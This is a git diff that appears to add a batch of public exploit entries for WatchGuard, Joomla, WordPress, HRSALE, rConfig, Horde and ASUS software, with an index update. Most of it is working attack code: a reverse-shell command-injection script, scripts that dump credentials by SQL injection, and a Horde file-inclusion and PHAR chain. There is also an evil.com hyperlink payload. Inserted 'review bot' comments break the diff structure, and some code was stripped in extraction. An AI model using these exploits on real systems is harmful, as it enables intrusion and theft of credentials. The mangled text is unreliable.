diff --git a/exploits/java/webapps/48203.txt b/exploits/java/webapps/48203.txt
new file mode 100644
index 000000000..6f6a0f981
--- /dev/null
+++ b/exploits/java/webapps/48203.txt
@@ -0,0 +1,168 @@
+# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
+# Author: RedTeam Pentesting GmbH
+# Date: 2020-03-11
+# Vendor: https://www.watchguard.com
+# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+# CVE: N/A
+
+Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
+
+RedTeam Pentesting discovered a credential-disclosure vulnerability in
+the AD Helper component of the WatchGuard Fireware Threat Detection and
+Response (TDR) service, which allows unauthenticated attackers to gain
+Active Directory credentials for a Windows domain in plaintext.
+
+
+Details
+=======
+
+Product: WatchGuard Fireware AD Helper Component
+Affected Versions: 5.8.5.10233, < 5.8.5.10317
+Fixed Versions: 5.8.5.10317
+Vulnerability Type: Information Disclosure
+Security Risk: high
+Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+
+Introduction
+============
+
+"Threat Detection and Response (TDR) is a cloud-based subscription
+service that integrates with your Firebox to minimize the consequences
+of data breaches and penetrations through early detection and automated
+remediation of security threats."
+
+"Threat Detection and Response includes the AD Helper component. If your
+network has an Active Directory server, you can install AD Helper to
+manage automated installation and updates of Host Sensors on your
+network."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+By accessing the AD Helper's web interface, it was discovered that a
+call to an API endpoint is made, which responds with plaintext
+credentials to all configured domain controllers. There is no
+authentication needed to use the described interface and the
+installation instructions at [1] contain no indication of any way to
+configure access control.
+
+
+Proof of Concept
+================
+
+An HTTP GET request to the path "/domains/list" of the AD Helper
+API returns, among others, the plaintext credentials to
+all configured Windows domain controllers:
+
+------------------------------------------------------------------------
+$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
+
+{
+  "content": [
+    {
+      "id": 1,
+      "fullyQualifiedName": "example.com",
+      "logonDomain": "example.com",
+      "domainControllers": "dc1.example.com",
+      "username": "[DOMAIN_USER]",
+      "password": "[DOMAIN_PASSWORD]",
+      "uuid": "[...]",
+      "servers": [
+        {
+          [...]
+        }
+      ]
+    }
+  ],
+  "totalPages": 1,
+  "totalElements": 1,
+  "number": 0,
+  "numberOfElements": 1
+}
+------------------------------------------------------------------------
+
+The same request and its response can be observed when initially accessing
+the web interface. The discovered version of AD Helper responds with
+the following server banner:
+
+------------------------------------------------------------------------
+jetty(winstone-5.8.5.10233-9.4.12.v20180830)
+------------------------------------------------------------------------
+
+It is likely that other versions of the AD Helper Component are
+vulnerable as well.
+
+
+Workaround
+==========
+
+Ensure API of the AD Helper Component is not reachable over the network,
+for example by putting it behind a Firewall.
+
+
+Fix
+===
+
+Update to Version 5.8.5.10317 or later.
+
+
+Security Risk
+=============
+
+No authentication is needed to access AD Helper's web interface and the
+installation instructions at [1] describe that configured domain user
+accounts must possess at least the following privileges:
+
+ * Connect to the host
+ * Mount the share ADMIN$
+ * Create a file on the host
+ * Execute commands on the host
+ * Install software on the host
+
+Access to the "ADMIN$" share implies a user with administrative
+privileges. Therefore, this vulnerability poses a high risk.
+
+
+Timeline
+========
+
+2020-02-12 Vulnerability identified
+2020-02-19 Customer approved disclosure to vendor
+2020-02-24 Tried to contact the German branch of WatchGuard
+2020-02-27 Contacted the Dutch branch of WatchGuard
+2020-02-28 Contact to ADHelper QA Team Lead established
+2020-03-02 Advisory draft sent for verification
+2020-03-10 Vendor released fixed version and blog post
+2020-03-11 CVE ID requested
+2020-03-11 Advisory released
+
+
+References
+==========
+
+[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
\ No newline at end of file
diff --git a/exploits/php/webapps/48202.txt b/exploits/php/webapps/48202.txt
new file mode 100644
index 000000000..3a7b5b75f
--- /dev/null
+++ b/exploits/php/webapps/48202.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
+# Date: 2020-03-10
+# Author: Milad Karimi
+# Software Link:
+# Version:
+# Category : webapps
+# Tested on: windows 10 , firefox
+# CVE : CWE-89
+# Dork: inurl:index.php?option=com_newsfeeds
+
+
+index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
+
+Example:
+
+http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
\ No newline at end of file
diff --git a/exploits/php/webapps/48204.txt b/exploits/php/webapps/48204.txt
new file mode 100644
index 000000000..d3c7f4d96
--- /dev/null
+++ b/exploits/php/webapps/48204.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
+# Google Dork: N/A
+# Date: 2020-03-05
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.codepeople.net/
+# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
+# Version: 1.3.34
+# Tested on: Windows 7 x86 SP1
+# CVE : CVE-2020-9371, CVE-2020-9372
+
+----Stored Cross-Site-Scripting-------------------
+
+1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
+2) Calendar Name= and Update
+3) Click in any of the other tabs
+
+----CSV injection---------------------------------
+
+1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out)
+2) Then we go to the page and introduce data, and the payload:
+
+New booking:
+
+Name: IMPORTANT DATA
+Description: http://evil.com/evil.php
+
+New booking:
+
+Name: test
+Description: =HYPERLINK(K2;H2)
+
+This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
+
+3) Then we go to Bookings List and export the CSV file
+4) After that we open the file, and import data from an external file, using comma as separator
+5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
+
+Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
\ No newline at end of file
diff --git a/exploits/php/webapps/48205.txt b/exploits/php/webapps/48205.txt
new file mode 100644
index 000000000..03b2b883e
--- /dev/null
+++ b/exploits/php/webapps/48205.txt
@@ -0,0 +1,51 @@ +# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-03-11 +# Exploit Author: Ismail Akıcı +# Vendor Homepage: http://hrsale.com/ +# Software Link : http://demo.hrsale.com/ +# Software : HRSALE v1.1.8 +# Product Version: v1.1.8 +# Vulnerability Type : Cross-Site Request Forgery (Add Admin) +# Vulnerability : Cross-Site Request Forgery + +# Description : +# CSRF vulnerability was discovered in v1.1.8 version of HRSALE. +# With this vulnerability, authorized users can be added to the system. + +HTML CSRF PoC : + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48207.py b/exploits/php/webapps/48207.py
new file mode 100755
index 000000000..284233dc4
--- /dev/null
+++ b/exploits/php/webapps/48207.py
@@ -0,0 +1,50 @@
+# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
+# Date: 2020-03-08
+# Exploit Author: Engin Demirbilek
+# Vendor Homepage: https://www.rconfig.com/
+# Version: rConfig <= 3.94
+# Tested on: centOS
+# CVE: CVE-2020-10221
+# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
+
+import requests
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+if len(sys.argv) < 6:
+    print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
+    exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])
+
+login = {
+    'user':user,
+    'pass':password,
+    'sublogin':'1'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)
+
+payload = {
+    'fileName':payload,
+}
+
+
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'},verify=False)
+
+if exploit.status_code == 200:
+    print "[+] Everything seems ok, check your listener."
+else:
+    print "[-] Exploit failed, system is patched or credentials are wrong."
\ No newline at end of file
diff --git a/exploits/php/webapps/48208.py b/exploits/php/webapps/48208.py
new file mode 100755
index 000000000..7e7d652c6
--- /dev/null
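Review bot: The header of 48207.py is inconsistent about scope: the title says rConfig 3.93, `# Version: rConfig <= 3.94` claims a wider range, and `# Tested on: centOS` names no rConfig build at all, so a reader cannot tell which versions were actually verified; the header should state the tested version explicitly and mark any other version as reported rather than tested. The script is Python 2 (statement-form `print`) but declares no interpreter, while its usage string advertises a direct `./exploit.py` invocation; noting the interpreter in the header would remove that mismatch. For defenders, the observable in this hunk is an authenticated POST to `/lib/ajaxHandlers/ajaxAddTemplate.php` whose `fileName` value carries shell metacharacters, which is the request shape a web-log or WAF rule would key on.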
+++ b/exploits/php/webapps/48208.py 
@@ -0,0 +1,107 @@
+# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection
+# Exploit Author: vikingfr
+# Date: 2020-03-03
+# CVE-2020-10220
+# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Install scripts :
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Version: tested v3.9.4
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# $ python3 rconfig_sqli.py https://1.1.1.1
+# rconfig 3.9 - SQL Injection PoC
+# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php
+# [+] Extracting the current DB name :
+# rconfig2
+# [+] Extracting 10 first users :
+# admin:1:63a9f0ea7bb98050796b649e85481845
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# [+] Extracting 10 first devices :
+# 127-0-0-1:127.0.0.1::ocdvulnpass:
+# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# Done
+
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print ("rconfig 3.9 - SQL Injection PoC")
+if len(sys.argv) != 2:
+    print ("[+] Usage : ./rconfig_exploit.py https://target")
+    exit()
+
+vuln_page="/commands.inc.php"
+vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
+given_target = sys.argv[1]
+target = given_target
+target += vuln_page
+target += vuln_parameters
+
+request = requests.session()
+dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)
+
+
+def extractDBinfos(myTarget=None,myPayload=None):
+    """
+    Extract information from database
+    Args:
+    - target+payload (String)
+    Returns:
+    - payload result (String)
+    """
+    result = ""
+    encoded_request = myTarget+myPayload
+    exploit_req = request.get(encoded_request)
+    if '[PWN]' in str(exploit_req.content):
+        result = str(exploit_req.content).split('[PWN]')[1]
+    else:
+        result="Maybe no more information ?"
+
+    return result
+
+
+if dashboard_request.status_code != 404:
+    print ("[+] Triggering the payloads on "+given_target+vuln_page)
+    # get the db name
+    print ("[+] Extracting the current DB name :")
+    db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
+    db_name = extractDBinfos(target,db_payload)
+    print (db_name)
+    # DB extract users
+    print ("[+] Extracting 10 first users :")
+    for i in range (0, 10):
+        user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
+        user_h = extractDBinfos(target,user1_payload)
+        #print ("[+] Dump device "+str(i))
+        print (user_h)
+    # DB extract devices information
+    print ("[+] Extracting 10 first devices :")
+    for i in range (0, 10):
+        device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
+        device_h = extractDBinfos(target,device_payload)
+        #print ("[+] Dump device "+str(i))
+        print (device_h)
+
+    print ("Done")
+
+else:
+    print ("[-] Please verify the URI")
+    exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/48209.py b/exploits/php/webapps/48209.py
new file mode 100755
index 000000000..704830834
--- /dev/null
+++ b/exploits/php/webapps/48209.py
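Review bot: The `#!/usr/bin/python3` line in 48208.py comes after the multi-line comment header and two blank lines, so it is an ordinary comment rather than a shebang; it should be the first line of the file or be dropped, with the interpreter noted in the header instead. The `extractDBinfos` docstring documents one argument, `target+payload (String)`, although the function takes `myTarget` and `myPayload` separately, and `import urllib.parse` is never used. For defenders, the hunk shows the request shape to alert on — a `searchColumn=` query against `/commands.inc.php` — and the `[PWN]` marker the script looks for in responses, which is a usable signature in web and application logs.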
@@ -0,0 +1,166 @@ +## exploit-inc-inclusion.py +#!/usr/bin/env python3 +from horde import Horde +import subprocess +import sys + +TEMP_DIR = '/tmp' + +if len(sys.argv) < 5: + print('Usage: ') + sys.exit(1) + +base_url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +filename = sys.argv[4] +php_code = sys.argv[5] + +# log into the web application +horde = Horde(base_url, username, password) + +# upload (delete manually) and evaluate the .inc file +horde.upload_to_tmp('{}.inc'.format(filename), ' ') + sys.exit(1) + +base_url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +filename = sys.argv[4] +php_code = sys.argv[5] + +source = '{}/{}.phar'.format(TEMP_DIR, filename) +destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually) +temp = 'temp.phar' +url = '{}/static/{}.php'.format(base_url, filename) + +# log into the web application +horde = Horde(base_url, username, password) + +# create a PHAR that performs a rename when loaded and runs the payload when executed +subprocess.run([ + 'php', 'create-renaming-phar.php', + temp, source, destination, php_code +], stderr=subprocess.DEVNULL) + +# upload the PHAR +with open(temp, 'rb') as fs: + phar_data = fs.read() + horde.upload_to_tmp('{}.phar'.format(filename), phar_data) + +# load the phar thus triggering the rename +horde.trigger_phar(source) + +# issue a request to trigger the payload +response = requests.get(url) +print(response.text) +## exploit-phar-loading.py EOF + + + + +## create-renaming-phar.php +#!/usr/bin/env php +_lockfile, $this->_params['filename']) if $this->_locked +class Horde_Auth_Passwd { + // visibility must match since protected members are prefixed by "\x00*\x00" + protected $_locked; + protected $_params; + + function __construct($source, $destination) { + $this->_params = array('filename' => $destination); + $this->_locked = true; + $this->_lockfile = $source; + } +}; + +function createPhar($path, $source, $destination, $stub) { + // 
create the object and specify source and destination files + $object = new Horde_Auth_Passwd($source, $destination); + + // create the PHAR + $phar = new Phar($path); + $phar->startBuffering(); + $phar->addFromString('x', ''); + $phar->setStub("setMetadata($object); + $phar->stopBuffering(); +} + +function main() { + global $argc, $argv; + + // check arguments + if ($argc != 5) { + fwrite(STDERR, "Usage: \n"); + exit(1); + } + + // create a fresh new phar + $path = $argv[1]; + $source = $argv[2]; + $destination = $argv[3]; + $stub = $argv[4]; + @unlink($path); + createPhar($path, $source, $destination, $stub); +} + +main(); +## create-renaming-phar.php EOF + + +## horde.py +import re +import requests + +class Horde(): + def __init__(self, base_url, username, password): + self.base_url = base_url + self.username = username + self.password = password + self.session = requests.session() + self.token = None + self._login() + + def _login(self): + url = '{}/login.php'.format(self.base_url) + data = { + 'login_post': 1, + 'horde_user': self.username, + 'horde_pass': self.password + } + response = self.session.post(url, data=data) + token_match = re.search(r'"TOKEN":"([^"]+)"', response.text) + assert ( + len(response.history) == 1 and + response.history[0].status_code == 302 and + response.history[0].headers['location'] == '/services/portal/' and + token_match + ), 'Cannot log in' + self.token = token_match.group(1) + + def upload_to_tmp(self, filename, data): + url = '{}/turba/add.php'.format(self.base_url) + files = { + 'object[photo][img][file]': (None, filename), + 'object[photo][new]': ('x', data) + } + response = self.session.post(url, files=files) + assert response.status_code == 200, 'Cannot upload the file to tmp' + + def include_remote_inc_file(self, path): + # vulnerable block (alternatively 'trean:trean_Block_Mostclicked') + app = 'trean:trean_Block_Bookmarks' + + # add one dummy bookmark (to be sure) + url = '{}/trean/add.php'.format(self.base_url) + data = 
{
+            'actionID': 'add_bookmark',
+            'url': 'x'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark'
+
+        # add bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark block'
+
+        # edit bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[template]': '../../../../../../../../../../../' + path
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the bookmark block'
+
+        # evaluate the remote file
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+        print(response.text)
+
+        # remove the bookmark block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the bookmark block'
+
+    def trigger_phar(self, path):
+        # vulnerable block (alternatively the same can be obtained by creating a
+        # bookmark with the PHAR path and clocking on it)
+        app = 'horde:horde_Block_Feed'
+
+        # add syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the syndicated feed block'
+
+        # edit syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[uri]': 'phar://{}'.format(path)
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the syndicated feed block'
+
+        # load the PHAR archive
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+
+        # remove the syndicated feed block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the syndicated feed block'
+## horde.py EOF
\ No newline at end of file
diff --git a/exploits/windows/local/48206.txt b/exploits/windows/local/48206.txt
new file mode 100644
index 000000000..d07245513
--- /dev/null
+++ b/exploits/windows/local/48206.txt
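Review bot: 48209.py as committed is several sources glued into one file — the `## exploit-inc-inclusion.py`, `## exploit-phar-loading.py EOF`, `## create-renaming-phar.php` and `## horde.py` markers are visible — so the `from horde import Horde` at its top cannot resolve when the file is treated as one module, and the header should say that the file is a bundle rather than a runnable script. The `Horde` helper relies on bare `assert` for every status check (for example `assert response.status_code == 200, 'Cannot upload the file to tmp'`), a pattern that is stripped under `python -O` and then leaves `self.token` as `None`; an explicit `if ...: raise` would be the conventional form. For defenders, the scripts' own comments say the uploaded `.inc`/`.phar` files and the `static/<name>.php` destination are left in place ("delete manually"), so those paths are the durable artifacts an investigation of a Horde host would look for. Part of this hunk's content was lost in page extraction (the `<?php` blocks and the start of the second script), so the file could only be checked as far as shown.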
@@ -0,0 +1,34 @@
+# Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-11
+# Vendor Homepage: https://www.asus.com/
+# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
+# Tested Version: 1.00.22
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 en
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """
+ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe Auto
+
+C:\>sc qc asHmComSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: asHmComSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ASUS HM Com Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7d5523f4f..2a3d45dac 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10988,6 +10988,7 @@ id,file,description,date,author,type,platform,port
 48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
+48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42457,3 +42458,11 @@ id,file,description,date,author,type,platform,port
 48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
 48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
 48197,exploits/php/webapps/48197.txt,"Wordpress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
+48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
+48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
+48204,exploits/php/webapps/48204.txt,"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
+48205,exploits/php/webapps/48205.txt,"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)",2020-03-12,"Ismail Akıcı",webapps,php,
+48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,
+48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php,
+48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
+48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
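Review bot: The 48203 index entry labels the fixed build as the affected one: `"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"`, whereas 48203.txt in this same commit states `Affected Versions: 5.8.5.10233, < 5.8.5.10317` and `Fixed Versions: 5.8.5.10317`; the description here and the `# Exploit:` line of 48203.txt should read `WatchGuard Fireware AD Helper Component < 5.8.5.10317 - Credential Disclosure` so that anyone triaging by version does not conclude the patched release is vulnerable. The author for 48202 is recorded as `"Milad karimi"` while the file header spells it `Milad Karimi`. 48210.py is indexed as a separate PHAR-loading script, yet the only Horde file added in the diff as shown is 48209.py, which appears to carry that script under a `## exploit-phar-loading.py EOF` marker — worth confirming that 48210.py actually exists in the tree.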